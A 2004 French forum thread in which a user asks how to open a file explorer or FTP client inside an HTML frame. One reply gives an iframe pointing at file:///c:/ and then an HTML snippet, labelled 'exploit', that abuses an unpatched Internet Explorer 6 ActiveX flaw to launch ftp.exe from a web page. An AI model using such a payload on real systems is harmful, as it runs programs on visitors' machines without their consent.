Ouvrir un explorateur dans une frame html ???

Fermé
blbg Messages postés 302 Date d'inscription mercredi 9 avril 2003 Statut Membre Dernière intervention 22 novembre 2007 - 3 juin 2004 à 09:34
blbg Messages postés 302 Date d'inscription mercredi 9 avril 2003 Statut Membre Dernière intervention 22 novembre 2007 - 4 juin 2004 à 10:31
bonjour,

je voudrais savoir si c'est possible d'ouvrir un explorateur dans une frame, car avec ça, je pourrais faire un transfer FTP, trés convivial

apparement (j'ai tester ds une fenêtre ms pas ds une frame) je peu ouvrir le FTP & en ouvran un explorateur à coté, je peu faire des cliqué, glissé & ça transfer bien sur le FTP...

dc la en ouvran le FTP & l'explorateur ds des frames, ... ça sera encore mieux ...

dc dite moi si c'est possible & si vous savez comment faire ..
car la je ne sais pas comment ouvrir ds une frame, autre chose q'un fichier texte, ...

++blbg

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
un gd merci à tous ceux qui nous aides ... :o)
A voir également:

3 réponses

blbg Messages postés 302 Date d'inscription mercredi 9 avril 2003 Statut Membre Dernière intervention 22 novembre 2007 10
3 juin 2004 à 15:21
bon, j'ai tester avec les frame, ça marche, sauf que dés qu'on ouvre un dossier (ou on revient au dossier principale)

ça ouvre la page ds la page entiére ( la frame saute :o( )
dc pourquoi pas le faire ds un popup (bien aligné & de bonne dimension ... pr faire comme ds des frames)

dc si qqun connait un moyen d'ouvrir exploreur via une page web ...
car si on fait un lien du genre <a href="C/windows/explorer.exe/"> il demande si on veut l'enregistrer ... lol

sinon greg, un peu de politesse, ça te ferait pas de mal je crois ...

fais voir ton code pour l'instant avec ton ouverture de fichier texte

... là j'ai pas envi de te le donner ... (avec un peux-tu au début , & un merci à la fin ... là oui ... & ç'est pareil, ton pour l'instant tu aurrais pus le garder, ... car ça se traduit par j'en ai rien a foutre de ton probléme mais montre tes source que je pompe ... )
pis en plus, .. c'est pas une ouverture de fichier texte, mais de FTP ... :o)

dc greg, tu a de la chance, que c'est un site communautaire, & que le but est d'aider les autres, ... (dc si t'as pas compris je le met pour les autres, (ça peu les aider ..) mais pas pour toi !!! )

ftp://ID:pass@serverFTP/
ID= votre identifiant (s'il en faut un)
pass=votre mot de passe (s'il en faut un aussi)
serverFTP= ftp.machin.fr (ou qque chose ds le genre)


*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
un gd merci à tous ceux qui nous aides ... :o)
1
greg49 Messages postés 154 Date d'inscription mardi 18 mai 2004 Statut Membre Dernière intervention 12 septembre 2007 8
3 juin 2004 à 11:54
salut,

fais voir ton code pour l'instant avec ton ouverture de fichier texte
0
Salut,

Je peux peut-être t'aider en t'ouvrant la voie sur 2 pistes:

- la première, ouvrir une frame explorer dans le navigateur, c'est po trô trô dur:

<iframe src="file:///c:/">

</iframe>


... seulement c'est pas dis que ca fonctionne avec le proto ftp...


- la deuxième va faire peur à certains, et sourir d'autres ( c'est selon l'orientation d'esprit... ):

une faille de contrôle ActiveX dans internet explorer 6 et antérieurs (lorsqu'il n'est pas patché) permet d'appeler une application depuis ce superbe produit micro$hit, dans une simple page HTML...




---> début du code (exemple) :

<html>
<body>
<span datasrc="#oExec" datafld="exploit" dataformatas="html">
</span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<Object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/WINDOWS/system32/ftp.exe"></object>
]]>
</exploit>
</security>
</xml>
</html>


<------- fin du code



A utiliser à bon escient, hein ?!



2Spartiate
Autodétruisons nous, le monde sera meilleur...
0
blbg Messages postés 302 Date d'inscription mercredi 9 avril 2003 Statut Membre Dernière intervention 22 novembre 2007 10
4 juin 2004 à 10:31
merci ...

je crois que je vais utiliser la premiére solution ... :o)

ça ouvre bien l'eplorateur ...
par contre, tu ne sais pas comment faire pour l'ouvrir sur le poste de travait & non sur C: ?? (pour être sur que malgrés le non des disq dur, ça passe tjs .. & si ils doivent aller chercher des info ds un autre périférique, ... )

sinon, en faite, je croi que je vais ouvrir 2 popup ... car sinon pour le FTP, ça fait tjs pareil (d"s que je navigue ds les dossiers .. ça s'ouvre en plein écran ! ) mais pas pour l'explorateur ... :o)

dc voilà ... probléme kasiment résolu ...

++blbg

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
un gd merci à tous ceux qui nous aides ... :o)
0